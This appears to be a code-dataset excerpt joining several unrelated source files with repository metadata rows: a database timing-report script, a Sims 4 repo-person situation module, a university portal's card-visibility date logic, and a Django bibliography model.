stddev_measured_ms text not null := '';
min_measured_ms text not null := '';
max_measured_ms text not null := '';
n int not null := 0;
methods constant text[] not null := array['sql', 'proc'];
method text not null := '';
begin
t := 'method nr_rows_per_txn avg_measured_ms stddev_measured_ms min_measured_ms max_measured_ms';
return next;
t := '------ --------------- --------------- ------------------ --------------- ---------------';
return next;
foreach method in array methods loop
n := 0;
for
q.nr_rows_per_txn,
q.avg_measured_ms,
q.stddev_measured_ms,
q.min_measured_ms,
q.max_measured_ms in (
select
lpad(to_char(a.nr_rows_per_txn, '99999'), 17),
lpad(to_char(a.avg_measured_ms, '99990.99'), 15),
lpad(to_char(a.stddev_measured_ms, '99990.99'), 18),
lpad(to_char(a.min_measured_ms, '99990.99'), 15),
lpad(to_char(a.max_measured_ms, '99990.99'), 15)
from avg_and_sddev_timings as a
where a.method = q.method
order by a.nr_rows_per_txn)
loop
n := n + 1;
case n = 1
when true then
if method = 'proc' then
t := ''; return next;
end if;
t := rpad(method, 6)||nr_rows_per_txn||' '||avg_measured_ms||' '||stddev_measured_ms||' '||min_measured_ms||' '||max_measured_ms;
else
t := rpad(' ', 6)||nr_rows_per_txn||' '||avg_measured_ms||' '||stddev_measured_ms||' '||min_measured_ms||' '||max_measured_ms;
end case;
return next;
end loop;
end loop;
end q;
t := ''; return next;
<<b>>declare
nr_rows_per_txn text not null := '';
speed_ratio text not null := '';
begin
t := 'nr_rows_per_txn speed_ratio'; return next;
t := '--------------- -----------'; return next;
for b.nr_rows_per_txn, b.speed_ratio in (
select
lpad(to_char(a.nr_rows_per_txn, '9999'), 15),
lpad(to_char(a.speed_ratio, '990.99'), 11)
from speed_ratios_versus_nr_rows_per_txn as a
order by a.nr_rows_per_txn)
loop
t := nr_rows_per_txn||' '||speed_ratio; return next;
end loop;
end;
end;
$body$;
""")
# ------------------------------------------------------------------------------------
def prepare_sqls(sess):
sess.execute(Stmts.prepare_select_timing_tests_next_k)
sess.execute(Stmts.prepare_update_timing_tests_next_k)
sess.execute(Stmts.prepare_insert_timing_tests)
sess.execute(Stmts.prepare_select_times_next_k)
sess.execute(Stmts.prepare_update_times_next_k)
sess.execute(Stmts.prepare_insert_times)
# ------------------------------------------------------------------------------------
class NrTxnsValues:
@staticmethod
def sum_1_though_n(n):
s = 0
for j in range(1, n + 1):
s += j
return s
def __init__(self):
# Populate with 1, 2, 4,... 256, 512, i.e. 2**0 through 2**9
self.nr_txns_values = []
for j in range(0, 10):
self.nr_txns_values += [2**j]
self.nr_tables = self.nr_txns_values[len(self.nr_txns_values) - 1]
# Could have calculated the expected checksum on-demand, in
# "single-table.py and "many-tables.py" using this:
#
# NTV.NrTxnsValues.sum_1_through_n(params.nr_rows_per_txn)
#
# But it's more stylish to use a dictionary of pre-computed values.
self.checksums = {}
for j in range(0, 10):
self.checksums[self.nr_txns_values[j]] = NrTxnsValues.sum_1_though_n(self.nr_txns_values[j])
| 35.080645 | 151 | 0.561635 | 2,413 | 19,575 | 4.261915 | 0.148777 | 0.069525 | 0.048619 | 0.057176 | 0.444282 | 0.34296 | 0.309704 | 0.264586 | 0.220051 | 0.188643 | 0 | 0.014633 | 0.308761 | 19,575 | 557 | 152 | 35.143627 | 0.745399 | 0.097676 | 0 | 0.26009 | 0 | 0.013453 | 0.669356 | 0.088073 | 0 | 0 | 0 | 0 | 0.006726 | 1 | 0.029148 | false | 0 | 0.006726 | 0 | 0.089686 | 0.006726 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d3c6388b962b0997a66cfe6c3d21cc7a096283 | 18,446 | py | Python | S4/S4 Library/simulation/situations/complex/repo_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/situations/complex/repo_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/situations/complex/repo_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | import enum
import operator
import random
from event_testing.resolver import SingleObjectResolver, SingleSimResolver
from event_testing.test_events import TestEvent
from event_testing.tests import TunableTestSet
from interactions.utils.outcome_enums import OutcomeResult
from interactions.utils.success_chance import SuccessChance
from sims.loan_tuning import LoanTunables
from sims4.localization import TunableLocalizedString
from sims4.tuning.instances import lock_instance_tunables
from sims4.tuning.tunable import TunableTuple, TunableInterval, TunablePercent, TunableList, OptionalTunable, TunableEnumEntry, Tunable, TunableRange
from sims4.tuning.tunable_base import GroupNames
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation import Situation
from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, CommonInteractionCompletedSituationState, SituationStateData, TunableInteractionOfInterest, SituationState
from situations.situation_types import SituationCreationUIOption
from ui.ui_dialog_notification import UiDialogNotification
import services
import sims4.log
logger = sims4.log.Logger('RepoSituation', default_owner='nsavalani')
class DebtSource(enum.Int):
SCHOOL_LOAN = ...
BILLS = ...
class _WaitForRepoPersonState(SituationState):
pass
class _FindObjectState(CommonSituationState):
def on_activate(self, reader=None):
super().on_activate(reader=reader)
current_object = None
while self.owner.objects_to_take:
obj_id = self.owner.objects_to_take.pop(0)[0]
obj = services.object_manager().get(obj_id)
if not obj.self_or_part_in_use:
current_object = obj
break
if current_object is not None:
self.owner.set_current_object(current_object)
self._change_state(self.owner.idle_at_object_state())
else:
self._change_state(self.owner.nothing_to_take_state())
def timer_expired(self):
self._change_state(self.owner.leave_state())
class _NothingToTakeState(CommonInteractionCompletedSituationState):
def _on_interaction_of_interest_complete(self, resolver=None, **kwargs):
self._change_state(self.owner.leave_state())
def timer_expired(self):
self._change_state(self.owner.leave_state())
class _IdleAtObjectState(CommonSituationState):
def on_activate(self, reader=None):
super().on_activate(reader=reader)
for custom_key in self.owner.bribe_interaction.custom_keys_gen():
self._test_event_register(TestEvent.InteractionComplete, custom_key)
for custom_key in self.owner.ask_not_to_take_interaction.custom_keys_gen():
self._test_event_register(TestEvent.InteractionComplete, custom_key)
def handle_event(self, sim_info, event, resolver):
repo_person = self.owner.repo_person()
if event == TestEvent.InteractionComplete and repo_person is not None and sim_info is repo_person.sim_info:
if resolver(self.owner.bribe_interaction):
if resolver.interaction.global_outcome_result == OutcomeResult.SUCCESS:
self.owner.clear_current_object()
self._change_state(self.owner.leave_state())
elif resolver(self.owner.ask_not_to_take_interaction):
if self.owner.ask_not_to_take_success_chances_list:
ask_not_to_take_chance = self.owner.ask_not_to_take_success_chances_list.pop(0).get_chance(resolver)
else:
ask_not_to_take_chance = 0
if random.random() < ask_not_to_take_chance:
self.owner.clear_current_object()
if self.owner.ask_not_to_take_success_notification is not None:
notification = self.owner.ask_not_to_take_success_notification(repo_person.sim_info, resolver=SingleSimResolver(repo_person.sim_info))
notification.show_dialog()
self._change_state(self.owner.find_object_state())
elif self.owner.ask_not_to_take_failure_notification is not None:
notification = self.owner.ask_not_to_take_failure_notification(repo_person.sim_info, resolver=SingleSimResolver(repo_person.sim_info))
notification.show_dialog()
def timer_expired(self):
self._change_state(self.owner.repossess_object_state())
class _RepossessObjectState(CommonInteractionCompletedSituationState):
def _on_interaction_of_interest_complete(self, resolver=None, **kwargs):
self.owner.reduce_debt(self.owner.current_object.depreciated_value)
self.owner.clear_current_object()
self.owner.on_object_repossessed()
def timer_expired(self):
self._change_state(self.owner.find_object_state())
class _LeaveState(CommonSituationState):
def on_activate(self, reader=None):
super().on_activate(reader)
repo_person = self.owner.repo_person()
if repo_person is not None:
services.get_zone_situation_manager().make_sim_leave_now_must_run(repo_person)
self.owner._self_destruct()
class RepoSituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'repo_person_job_and_role_state': TunableSituationJobAndRoleState(description='\n The job and role state for the repo-person.\n ', tuning_group=GroupNames.ROLES), 'debtor_sim_job_and_role_state': TunableSituationJobAndRoleState(description='\n The job and role state for the Sim from the active household whose\n unpaid debt is being collected by the repo-person.\n ', tuning_group=GroupNames.ROLES), 'repo_amount': TunableTuple(description='\n Tuning that determines the simoleon amount the repo-person is\n trying to collect.\n ', target_amount=TunablePercent(description='\n The percentage of current debt which determines the base\n amount the repo-person will try to collect.\n ', default=10), min_and_max_collection_range=TunableInterval(description='\n Multipliers that define the range around the target amount\n that determine which objects should be taken.\n ', tunable_type=float, default_lower=1, default_upper=1), tuning_group=GroupNames.SITUATION), 'save_lock_tooltip': TunableLocalizedString(description='\n The tooltip to show when the player tries to save the game while\n this situation is running. The save is locked when the situation\n starts.\n ', tuning_group=GroupNames.SITUATION), 'find_object_state': _FindObjectState.TunableFactory(description='\n The state that picks an object for the repo-person to take.\n ', display_name='1. Find Object State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'nothing_to_take_state': _NothingToTakeState.TunableFactory(description='\n The state at which there is nothing for the repo-person to take.\n ', display_name='2. Nothing To Take State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'idle_at_object_state': _IdleAtObjectState.TunableFactory(description='\n The state at which the repo-person waits near the picked object\n and can be asked not to take the object.\n ', display_name='3. Idle At Object State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'repossess_object_state': _RepossessObjectState.TunableFactory(description='\n The state at which the repo-person will repossess the picked object.\n ', display_name='4. Repossess Object State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'leave_state': _LeaveState.TunableFactory(description='\n The state at which the repo-person leaves the lot.\n ', display_name='5. Leave State', tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP), 'valid_object_tests': TunableTestSet(description='\n Test set that determines if an object on the lot is valid for\n repossession.\n ', tuning_group=GroupNames.SITUATION), 'ask_not_to_take_success_chances': TunableList(description='\n List of values that determine the chance of success of the ask\n not to take interaction, with each chance being used once and then\n moving to the next. After using all the tuned chances the next\n ask not to take interaction will always fail.\n ', tunable=SuccessChance.TunableFactory(description='\n Chance of success of the "Ask Not To Take" interaction.\n '), tuning_group=GroupNames.SITUATION), 'bribe_interaction': TunableInteractionOfInterest(description='\n If this interaction completes successfully, the repo-person will\n leave the lot without repossessing anything.\n '), 'ask_not_to_take_interaction': TunableInteractionOfInterest(description='\n When this interaction completes, the situation will determine if\n the repo-person should find another object to repossess or not\n based on the tuned success chances.\n '), 'ask_not_to_take_failure_notification': OptionalTunable(description='\n A TNS that displays when an ask-not-to-take interaction fails, if enabled.\n ', tunable=UiDialogNotification.TunableFactory()), 'ask_not_to_take_success_notification': OptionalTunable(description='\n A TNS that displays when an ask-not-to-take interaction succeeds, if enabled.\n ', tunable=UiDialogNotification.TunableFactory()), 'debt_source': TunableEnumEntry(description="\n The source of where the debt is coming from and where it'll be removed.\n ", tunable_type=DebtSource, default=DebtSource.SCHOOL_LOAN), 'maximum_object_to_repossess': OptionalTunable(description='\n The total maximum objects that the situation will take.\n ', tunable=TunableRange(description='\n The total maximum objects that the situation will take.\n If Use Debt Amount is specified then the situation will keep taking objects\n until there are no more valid objects to take or we have removed all of the\n debt.\n ', tunable_type=int, default=1, minimum=1), enabled_by_default=True, enabled_name='has_maximum_value', disabled_name='use_debt_amount'), 'auto_clear_debt_event': OptionalTunable(description='\n If enabled then we will have an even we listen to to cancel the debt.\n ', tunable=TunableEnumEntry(description='\n The event that when triggered will cause all the debt to be cancelled and the\n repo man to leave.\n ', tunable_type=TestEvent, default=TestEvent.Invalid, invalid_enums=(TestEvent.Invalid,)))}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.objects_to_take = []
self.current_object = None
self.ask_not_to_take_success_chances_list = list(self.ask_not_to_take_success_chances)
self._reservation_handler = None
self._objects_repossessed = 0
@classmethod
def _states(cls):
return (SituationStateData(1, _WaitForRepoPersonState), SituationStateData(2, _FindObjectState, factory=cls.find_object_state), SituationStateData(3, _NothingToTakeState, factory=cls.nothing_to_take_state), SituationStateData(4, _IdleAtObjectState, factory=cls.idle_at_object_state), SituationStateData(5, _RepossessObjectState, factory=cls.repossess_object_state), SituationStateData(6, _LeaveState, factory=cls.leave_state))
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.repo_person_job_and_role_state.job, cls.repo_person_job_and_role_state.role_state), (cls.debtor_sim_job_and_role_state.job, cls.debtor_sim_job_and_role_state.role_state)]
@classmethod
def default_job(cls):
pass
def repo_person(self):
sim = next(self.all_sims_in_job_gen(self.repo_person_job_and_role_state.job), None)
return sim
def debtor_sim(self):
sim = next(self.all_sims_in_job_gen(self.debtor_sim_job_and_role_state.job), None)
return sim
def _cache_valid_objects(self):
debt_value = self.get_debt_value()
if debt_value is None:
self._self_destruct()
return
target_amount = debt_value*self.repo_amount.target_amount
unsorted = []
plex_service = services.get_plex_service()
check_common_area = plex_service.is_active_zone_a_plex()
debtor_household_id = self.debtor_sim().household_id
for obj in services.object_manager().valid_objects():
if not obj.get_household_owner_id() == debtor_household_id:
continue
if not obj.is_on_active_lot():
continue
if check_common_area and plex_service.get_plex_zone_at_position(obj.position, obj.level) is None:
continue
if not obj.is_connected(self.repo_person()):
continue
if obj.children:
continue
resolver = SingleObjectResolver(obj)
if self.valid_object_tests.run_tests(resolver):
delta = abs(obj.depreciated_value - target_amount)
unsorted.append((obj.id, delta))
self.objects_to_take = sorted(unsorted, key=operator.itemgetter(1))
def _on_add_sim_to_situation(self, sim, job_type, role_state_type_override=None):
super()._on_add_sim_to_situation(sim, job_type, role_state_type_override=role_state_type_override)
if self.debtor_sim() is not None and self.repo_person() is not None:
self._cache_valid_objects()
self._change_state(self.find_object_state())
def _destroy(self):
super()._destroy()
self.clear_current_object()
services.get_persistence_service().unlock_save(self)
if self.auto_clear_debt_event is not None:
services.get_event_manager().unregister_single_event(self, self.auto_clear_debt_event)
def start_situation(self):
services.get_persistence_service().lock_save(self)
super().start_situation()
self._change_state(_WaitForRepoPersonState())
if self.auto_clear_debt_event is not None:
services.get_event_manager().register_single_event(self, self.auto_clear_debt_event)
def handle_event(self, sim_info, event, resolver):
super().handle_event(sim_info, event, resolver)
if self.auto_clear_debt_event is None:
return
if event != self.auto_clear_debt_event:
return
self.clear_debt()
self._change_state(self.leave_state())
def reduce_debt(self, amount):
if self.debt_source == DebtSource.SCHOOL_LOAN:
host_sim_info = services.sim_info_manager().get(self._guest_list.host_sim_id)
statistic = host_sim_info.get_statistic(LoanTunables.DEBT_STATISTIC, add=False)
if statistic is None:
return
else:
statistic.add_value(-amount)
elif self.debt_source == DebtSource.BILLS:
services.active_household().bills_manager.reduce_amount_owed(amount)
else:
logger.error('Attempting to use a debt source that is not handled', owner='jjacobson')
return
def clear_debt(self):
if self.debt_source == DebtSource.SCHOOL_LOAN:
host_sim_info = services.sim_info_manager().get(self._guest_list.host_sim_id)
statistic = host_sim_info.get_statistic(LoanTunables.DEBT_STATISTIC, add=False)
if statistic is None:
return
else:
statistic.set_value(0)
elif self.debt_source == DebtSource.BILLS:
services.active_household().bills_manager.pay_bill(clear_bill=True)
else:
logger.error('Attempting to use a debt source {} that is not handled', self.debt_source, owner='jjacobson')
return
def get_debt_value(self):
if self.debt_source == DebtSource.SCHOOL_LOAN:
host_sim_info = services.sim_info_manager().get(self._guest_list.host_sim_id)
statistic = host_sim_info.get_statistic(LoanTunables.DEBT_STATISTIC, add=False)
if statistic is None:
return
return statistic.get_value()
if self.debt_source == DebtSource.BILLS:
return services.active_household().bills_manager.current_payment_owed
else:
logger.error('Attempting to use a debt source that is not handled', owner='jjacobson')
return
def on_object_repossessed(self):
self._objects_repossessed += 1
if self.maximum_object_to_repossess is None or self._objects_repossessed < self.maximum_object_to_repossess:
debt_value = self.get_debt_value()
if debt_value is not None and debt_value > 0:
self._change_state(self.find_object_state())
return
self._change_state(self.leave_state())
def get_target_object(self):
return self.current_object
def get_lock_save_reason(self):
return self.save_lock_tooltip
def set_current_object(self, obj):
self.current_object = obj
if self._reservation_handler is not None:
logger.error('Trying to reserve an object when an existing reservation already exists: {}', self._reservation_handler)
self._reservation_handler.end_reservation()
self._reservation_handler = self.current_object.get_reservation_handler(self.repo_person())
self._reservation_handler.begin_reservation()
def clear_current_object(self):
self.current_object = None
if self._reservation_handler is not None:
self._reservation_handler.end_reservation()
self._reservation_handler = None
lock_instance_tunables(RepoSituation, exclusivity=BouncerExclusivityCategory.NORMAL, creation_ui_option=SituationCreationUIOption.NOT_AVAILABLE) | 68.572491 | 5,764 | 0.710181 | 2,283 | 18,446 | 5.440648 | 0.154183 | 0.016424 | 0.016665 | 0.020288 | 0.450044 | 0.406731 | 0.376218 | 0.303035 | 0.256099 | 0.225505 | 0 | 0.002208 | 0.214464 | 18,446 | 269 | 5,765 | 68.572491 | 0.855003 | 0 | 0 | 0.385281 | 0 | 0.051948 | 0.215916 | 0.015179 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125541 | false | 0.008658 | 0.08658 | 0.017316 | 0.337662 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d5af4312e21f1f9ab8d022d2b76d516a33aa34 | 9,461 | py | Python | myuw/dao/card_display_dates.py | uw-it-aca/myuw | 3fa1fabeb3c09d81a049f7c1a8c94092d612438a | [
"Apache-2.0"
] | 18 | 2015-02-04T01:09:11.000Z | 2021-11-25T03:10:39.000Z | myuw/dao/card_display_dates.py | uw-it-aca/myuw | 3fa1fabeb3c09d81a049f7c1a8c94092d612438a | [
"Apache-2.0"
] | 2,323 | 2015-01-15T19:45:10.000Z | 2022-03-21T19:57:06.000Z | myuw/dao/card_display_dates.py | uw-it-aca/myuw | 3fa1fabeb3c09d81a049f7c1a8c94092d612438a | [
"Apache-2.0"
] | 9 | 2015-01-15T19:29:26.000Z | 2022-02-11T04:51:23.000Z | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
"""
Generates the booleans to determine card visibility,
based on dates in either the current, next, or previous term.
https://docs.google.com/document/d/14q26auOLPU34KFtkUmC_bkoo5dAwegRzgpwmZEQMhaU
"""
import logging
import traceback
from datetime import datetime, timedelta
from myuw.dao import log_err
from myuw.dao.term import get_comparison_datetime,\
get_current_quarter, get_next_quarter, get_previous_quarter,\
get_term_after, is_in_summer_quarter,\
is_in_summer_b_term, get_bod_current_term_class_start,\
get_eod_current_term_last_instruction, get_bod_7d_before_last_instruction,\
get_eod_7d_after_class_start, get_eod_current_term_last_final_exam
from myuw.dao.term import get_bod_class_start_quarter_after as\
get_bod_quarter_after
from myuw.dao.iasystem import in_coursevel_fetch_window
logger = logging.getLogger(__name__)
def in_show_grades_period(term, request):
return (term is not None and request is not None and
get_comparison_datetime(request) < get_bod_quarter_after(term))
def get_card_visibilty_date_values(request=None):
values = get_values_by_date(get_comparison_datetime(request),
request)
set_js_overrides(request, values)
return values
def get_values_by_date(now, request):
"""
now is a datetime object of 1 second after the beginning of the day.
"""
reg_data = get_reg_data(now, request)
data = {
"is_after_7d_before_last_instruction":
is_after_7d_before_last_instruction(now, request),
"is_after_grade_submission_deadline":
is_before_bof_term(now, request),
"is_after_last_day_of_classes":
not is_before_last_day_of_classes(now, request),
"is_after_start_of_registration_display_period":
reg_data["after_start"],
"is_after_start_of_summer_reg_display_period1":
reg_data["after_summer1_start"],
"is_after_start_of_summer_reg_display_periodA":
reg_data["after_summerA_start"],
"is_before_eof_7days_of_term":
is_before_eof_7d_after_class_start(now, request),
"is_before_end_of_finals_week":
is_before_eof_finals_week(now, request),
"is_before_end_of_registration_display_period":
reg_data["after_start"],
"is_before_end_of_summer_reg_display_periodA":
reg_data["after_summerA_start"],
"is_before_end_of_summer_reg_display_period1":
reg_data["after_summer1_start"],
"is_before_first_day_of_term":
is_before_bof_term(now, request),
"is_before_last_day_of_classes":
is_before_last_day_of_classes(now, request),
"myplan_peak_load": during_myplan_peak_load(now, request),
"reg_period1_started": reg_data["period1_started"],
"is_summer": is_in_summer_quarter(request),
"is_after_summer_b": is_in_summer_b_term(request),
"in_coursevel_fetch_window": in_coursevel_fetch_window(request),
"comparison_date": get_comparison_datetime(request)
}
try:
last_term = get_previous_quarter(request)
data["current_summer_term"] = "{},summer".format(last_term.year)
data["last_term"] = "{},{}".format(last_term.year, last_term.quarter)
except Exception:
log_err(logger, "get_previous_quarter", traceback, request)
return data
def is_before_bof_term(now, request):
"""
The term switches after the grade submission deadline.
@return true if it is before the begining of the 1st day of instruction
"""
logger.debug("{} is_before_bof_term {} ==> {}".format(
now, get_bod_current_term_class_start(request),
now < get_bod_current_term_class_start(request)))
return now < get_bod_current_term_class_start(request)
def is_before_eof_7d_after_class_start(now, request):
"""
@return true if it is before the end of the 7 days
after the instruction start day
"""
logger.debug("{} is_before_eof_7d_after_class_start {} ==> {}".format(
now, get_eod_7d_after_class_start(request),
now < get_eod_7d_after_class_start(request)))
return now < get_eod_7d_after_class_start(request)
def is_after_7d_before_last_instruction(now, request):
"""
@return true if it is after the begining of 7 days
before instruction end
"""
logger.debug("{} is_after_7d_before_last_instruction {} ==> {}".format(
now, get_bod_7d_before_last_instruction(request),
now > get_bod_7d_before_last_instruction(request)))
return now > get_bod_7d_before_last_instruction(request)
def is_before_last_day_of_classes(now, request):
"""
@return true if it is before the end of the last day of classes
"""
logger.debug("{} is_before_last_day_of_classes {} ==> {}".format(
now, get_eod_current_term_last_instruction(request),
now < get_eod_current_term_last_instruction(request)))
return now < get_eod_current_term_last_instruction(request)
def is_before_eof_finals_week(now, request):
"""
@return true if it is before the end of the last day of finalsweek
"""
logger.debug("{} is_before_eof_finals_week {} ==> {}".format(
now, get_eod_current_term_last_final_exam(request),
now < get_eod_current_term_last_final_exam(request)))
return now < get_eod_current_term_last_final_exam(request)
def during_myplan_peak_load(now, request):
reg_data = get_reg_data(now, request)
logger.debug("{} myplan_peak_load ==> {}".format(
now, reg_data["myplan_peak_load"]))
return reg_data["myplan_peak_load"]
def get_reg_data(now, request):
"""
now is the second after mid-night
"""
if hasattr(request, "myuw_reg_data"):
return request.myuw_reg_data
term_reg_data = {
"after_start": False,
"after_summer1_start": False,
"after_summerA_start": False,
"period1_started": False,
"myplan_peak_load": False
}
next_term = get_next_quarter(request)
get_term_reg_data(now, next_term, term_reg_data)
# We need to show this term's registration stuff, because
# the period 2 stretches past the grade submission deadline
current_term = get_current_quarter(request)
get_term_reg_data(now, current_term, term_reg_data)
# We also need to be able to show the term after next, in spring quarter
term_after_next = get_term_after(next_term)
get_term_reg_data(now, term_after_next, term_reg_data)
request.myuw_reg_data = term_reg_data
return term_reg_data
def is_term_myplan_peak(now, term, data):
now_date = now.date()
if (now_date >= term.registration_period1_start and
now_date <= term.registration_period1_end):
peak_start_time = datetime(now.year, now.month, now.day, 5, 30, 0)
peak_end_time = datetime(now.year, now.month, now.day, 6, 30, 0)
if (now >= peak_start_time and now <= peak_end_time):
return True
return False
def get_term_reg_data(now, term, data):
if term.registration_period1_start is None:
data["myplan_peak_load"] = False
return
if not (data["myplan_peak_load"] is True):
data["myplan_peak_load"] = is_term_myplan_peak(now, term, data)
now = now.date()
if term.quarter == "summer":
if now >= term.registration_period1_start - timedelta(days=7) and\
now < term.registration_period1_start + timedelta(days=7):
data["after_summerA_start"] = True
data["before_summerA_end"] = True
if now >= term.registration_period1_start:
data["period1_started"] = True
elif now >= term.registration_period1_start + timedelta(days=7) and\
now < term.registration_period2_start + timedelta(days=7):
data["after_summer1_start"] = True
data["before_summer1_end"] = True
if now >= term.registration_period1_start:
data["period1_started"] = True
else:
if now >= term.registration_period1_start - timedelta(days=14) and\
now < term.registration_period2_start + timedelta(days=7):
data["after_start"] = True
data["before_end"] = True
if now >= term.registration_period1_start:
data["period1_started"] = True
def set_js_overrides(request, values):
after_reg = 'is_after_start_of_registration_display_period'
before_reg = 'is_before_end_of_registration_display_period'
MAP = {'myuw_after_submission': 'is_after_grade_submission_deadline',
'myuw_after_last_day': 'is_after_last_day_of_classes',
'myuw_after_reg': after_reg,
'myuw_before_finals_end': 'is_before_end_of_finals_week',
'myuw_before_last_day': 'is_before_last_day_of_classes',
'myuw_before_end_of_reg_display': before_reg,
'myuw_before_first_day': 'is_before_first_day_of_term',
'myuw_before_end_of_first_week': 'is_before_eof_7days_of_term',
'myuw_after_eval_start': 'is_after_7d_before_last_instruction',
'myplan_peak_load': 'myplan_peak_load',
'myuw_in_coursevel_fetch_window': 'in_coursevel_fetch_window'
}
for key in MAP:
if key in request.session:
values[MAP[key]] = request.session[key]
| 40.088983 | 79 | 0.702146 | 1,310 | 9,461 | 4.619084 | 0.125191 | 0.039663 | 0.027764 | 0.034209 | 0.596596 | 0.52074 | 0.430507 | 0.332177 | 0.174021 | 0.128078 | 0 | 0.010154 | 0.208857 | 9,461 | 235 | 80 | 40.259574 | 0.798263 | 0.103689 | 0 | 0.107784 | 1 | 0 | 0.225003 | 0.133517 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077844 | false | 0 | 0.041916 | 0.005988 | 0.203593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05dc9e06abce6cc09cc36c86c50ef30f13b3073b | 5,140 | py | Python | src/api/models.py | ppknUWr/backend-bbz | 5ee82737d4c65be109677ec9485ec7f59aae62bf | [
"Apache-2.0"
] | 1 | 2021-03-03T19:12:26.000Z | 2021-03-03T19:12:26.000Z | src/api/models.py | ppknUWr/backend-bbz | 5ee82737d4c65be109677ec9485ec7f59aae62bf | [
"Apache-2.0"
] | 10 | 2021-03-01T16:11:29.000Z | 2021-10-04T18:36:33.000Z | src/api/models.py | ppknUWr/backend-bbz | 5ee82737d4c65be109677ec9485ec7f59aae62bf | [
"Apache-2.0"
] | null | null | null | from django.db import models
import api.json_worker as json_worker
"""
ABSTRACT MODEL
Class BibliographyTemplateModel
Handles all fields that are in our bibliography databases.
"""
class BibliographyTemplateModel(models.Model):
# FIELDS GO HERE
id = models.IntegerField(primary_key=True) #1 - ID rekordu (integer)
book_author = models.CharField(default = "Bez autora", max_length=512, verbose_name = "Autor książki") #2.5 - Autor (autor książki)
co_authors = models.CharField(max_length=256, default = "Bez współtwórcy.", verbose_name = "Współtwórca") #3 - Współtwórca (string)
editor = models.CharField(max_length = 256, default = "Bez redaktora.", verbose_name = "Redaktor") #4 - Redaktor (string)
title = models.TextField(default = "Brak Tytułu.", verbose_name = "Tytuł") #5 - Tytuł (string)
subtitle = models.TextField(default = "Bez podtytułu", verbose_name = "Podtytuł") #6 - Podtytuł (string)
original_edition = models.TextField(default = "Bez wydania oryginalnego.", verbose_name = "Wydanie oryginalne") #7 - Wydane oryginalne (string)
series = models.TextField(default = "Bez numeru serii.", verbose_name = "Numer serii") #8 - Numer serii (string?)
publication_date = models.TextField(default = "Brak roku wydania.", verbose_name = "Rok wydania") #9 - Rok wydania (TextField, string)
publication = models.TextField(default = "Bez wydania.", verbose_name = "Wydanie") #10 - Wydanie (string)
publication_place = models.TextField(default = "Bez miejsca wydania.", verbose_name = "Miejsce wydania") #11 - Miejsce wydania (string)
publisher = models.TextField(default = "Bez wydawcy.", verbose_name = "Wydawca") #12 - Wydawca (string)
source = models.TextField(default = "Bez źródła.", verbose_name = "Źródło") #13 - Źródło (string)
number = models.TextField(default = "Bez numeru.", verbose_name = "Numer") #14 - Numer (string)
notebook = models.TextField(default = "Bez zeszytu.", verbose_name = "Zeszyt") #15 - Zeszyt (string)
pages = models.TextField(default = "0", verbose_name = "Ilość stron") #16 - Strony (Text Field (string))
language = models.TextField(default = "Bez języka.", verbose_name = "Język") #17 - Język (string)
isbn_or_issn_number = models.TextField(default = "Bez numeru ISBN/ISSN.", verbose_name = "Numer ISBN/ISSN") #18 - ISBN/ISSN numer (string)
doi_number = models.TextField(default = "Bez numeru DOI.", verbose_name = "Numer DOI") #19 - Numer DOI (strng)
link = models.URLField(max_length=1024, verbose_name = "Link/Załącznik") #20 - Link (URLField)
keywords_and_content = models.TextField(default = "Bez słów kluczowych/zawratości.", verbose_name = "Słowa kluczowe") #21 - Słowa kluczowe, zawartość (string)
comments = models.TextField(default = "Bez komentarzy.", verbose_name = "Komentarze") #22 - Komentarze (string)
def __str__(self):
return self.title
class Meta:
abstract = True
verbose_name_plural = "Test"
"""
Class NewBibliographyDynamicModel
Class handle method to CREATE new dynamic model from BibliographyTemplateModel
"""
class NewBibliographyDynamicModel(object):
_instance = dict()
def __new__(cls, base_cls, tb_name):
"""
Create Class
:param base_cls: class name
:param tb_name: table name
:return:
"""
new_cls_name = tb_name
if new_cls_name not in cls._instance:
new_meta_cls = base_cls.Meta
new_meta_cls.db_table = tb_name
model_cls = type(str(new_cls_name), (base_cls,),
{'__tablename__': tb_name, 'Meta': new_meta_cls, '__module__': cls.__module__})
cls._instance[new_cls_name] = model_cls
return cls._instance[new_cls_name]
"""
Model to save meta data about the models available
"""
